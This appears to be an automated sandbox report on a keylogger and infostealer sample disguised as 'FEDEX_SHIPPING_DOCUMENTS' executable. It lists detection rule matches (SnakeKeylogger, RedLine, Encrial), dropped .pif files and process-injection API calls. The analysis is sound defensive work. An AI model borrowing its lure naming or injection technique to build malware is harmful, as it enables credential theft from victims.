Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.1.hzwdvhxM.pif.4da6c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.1.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.Mxhvdwzh.PIF.215fa548.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.21686db8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.hzwdvhxM.pif.438038.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.Mxhvdwzh.PIF.2169cbd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.1.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.4da6c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000001.1674039682.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3896243951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.3896211622.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000001.1589020424.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000001.1451761141.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.3896174260.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D642A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02D642A8
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D633F8 NtWriteVirtualMemory,	0_2_02D633F8
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D630AC NtAllocateVirtualMemory,	0_2_02D630AC
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D696E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02D696E4
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D69600 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02D69600
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D69578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02D69578
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D63BBC NtUnmapViewOfSection,	0_2_02D63BBC
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D6394C NtReadVirtualMemory,	0_2_02D6394C
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D642A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02D642A6
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D630AA NtAllocateVirtualMemory,	0_2_02D630AA
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Code function: 0_2_02D69524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02D69524
Source: C:\Users\Public\ndpha.pif	Code function: 9_2_00595CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	9_2_00595CF1
Source: C:\Users\Public\ndpha.pif	Code function: 9_2_005940B1 NtQuerySystemInformation,	9_2_005940B1
Source: C:\Users\Public\ndpha.pif	Code function: 9_2_00595D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	9_2_00595D6A
Source: C:\Users\Public\ndpha.pif	Code function: 9_2_00595911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxW,CreateActCtxW,GetModuleHandleW,CreateActCtxW,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	9_2_00595911
Source: C:\Users\Public\ndpha.pif	Code function: 9_2_00594136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	9_2_00594136
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_03053BBC NtUnmapViewOfSection,	11_2_03053BBC
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_030533F8 NtWriteVirtualMemory,	11_2_030533F8
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_030542A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	11_2_030542A8
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_0305394C NtReadVirtualMemory,	11_2_0305394C
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_030530AC NtAllocateVirtualMemory,	11_2_030530AC
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Code function: 11_2_030596E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	11_2_030596E4
